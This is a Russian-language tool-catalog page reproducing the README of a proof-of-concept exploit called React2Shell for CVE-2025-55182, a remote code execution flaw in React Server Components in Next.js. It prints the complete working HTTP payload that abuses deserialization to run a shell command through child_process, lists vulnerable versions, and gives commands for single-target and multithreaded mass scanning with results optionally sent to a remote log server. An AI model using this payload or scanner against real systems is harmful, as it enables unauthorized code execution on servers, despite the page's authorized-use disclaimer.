Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell — это proof-of-concept эксплойт для CVE-2025-55182, затрагивающий уязвимые реализации React Server Components (RSC) в Next.js. | Kitploit
Инструменты/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell — это proof-of-concept эксплойт для CVE-2025-55182, затрагивающий уязвимые реализации React Server Components (RSC) в Next.js.

Репозиторий
121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

💀 Эксплойт React2Shell — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Удалённое выполнение кода в React Server Components

CVE-2025-55182

Автор: INDRA


⚠️ Отказ от ответственности

Этот проект предоставляется только в образовательных целях, для исследований в области безопасности и авторизованного тестирования на проникновение.

Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением.

Используйте этот эксплойт только против систем, которыми вы владеете или на тестирование которых у вас есть явное разрешение.


📖 Описание

React2Shell — это эксплойт уровня proof-of-concept для CVE-2025-55182, поражающий уязвимые реализации React Server Components (RSC) в Next.js.

Эксплойт отправляет специально сформированный multipart-запрос, который использует уязвимый процесс десериализации и извлекает вывод команды через digest редиректа в ответе приложения.

В случае успеха эксплойт отображает вывод выполненной команды прямо в терминале.


✨ Возможности

  • 🚀 Режим одиночной цели
  • 🌍 Режим массового сканирования
  • 🔄 Автоматическое определение HTTP и HTTPS
  • ⚡ Многопоточное выполнение
  • 📝 Необязательное локальное логирование
  • 🌐 Необязательный удалённый лог-сервер
  • 🎯 Чистый вывод
  • 🛡 Отключена проверка SSL (для тестовых сред)
  • 📂 Удаление дублирующихся целей

📦 Требования

Python 3.8+

Установите зависимости:

root@kitploit:~
pip install requests urllib3

📁 Структура проекта

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 Уязвимые версии

React

ВерсияСтатус
19.0⚠ Уязвима
19.1.0⚠ Уязвима
19.1.1⚠ Уязвима
19.2.0⚠ Уязвима
19.0.1✅ Исправлена
19.1.2✅ Исправлена
19.2.1✅ Исправлена

Next.js

Уязвимые

  • 14.3.0-canary.77 и новее
  • 15.x
  • 16.x

Исправленные

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Используемый HTTP-запрос

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Использование

Показать справку

root@kitploit:~
python exploit.py -h

Сканирование одной цели

root@kitploit:~
python exploit.py -u https://target.com

Сканирование нескольких целей

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

Запуск

root@kitploit:~
python exploit.py -f targets.txt

Сохранение результатов

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

Отправка результатов на удалённый лог-сервер

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

Всё вместе

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Параметры командной строки

ПараметрОписание
-uURL цели
-fФайл с целевыми доменами
-oСохранить уязвимые цели локально
-lОтправить результаты на удалённый лог-сервер
-hПоказать справку

🖥 Пример вывода

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Как это работает

  1. Считывает цель(и)
  2. Автоматически генерирует HTTP и HTTPS URL-адреса
  3. Отправляет специально сформированный multipart-запрос
  4. Анализирует digest редиректа
  5. Извлекает вывод команды
  6. Выводит информацию об успешной эксплуатации
  7. При необходимости сохраняет результаты локально или удалённо

📌 Примечания

  • Автоматически проверяет как HTTP, так и HTTPS, если схема не указана.
  • Дублирующиеся цели удаляются автоматически.
  • Использует 30 параллельных потоков.
  • Игнорирует недействительные SSL-сертификаты.
  • Тайм-аут установлен на 10 секунд.

❤️ Авторы

  • Разработка эксплойта: INDRA
  • CVE: CVE-2025-55182

⚖️ Правовое уведомление

Несанкционированное использование данного программного обеспечения против систем без разрешения может нарушать местные, национальные или международные законы.

Автор не несёт ответственности за любое неправомерное использование.


⭐ Если этот проект помог вам в исследованиях, поставьте ему звезду.

Удачной охоты 🕷️

Скачать инструмент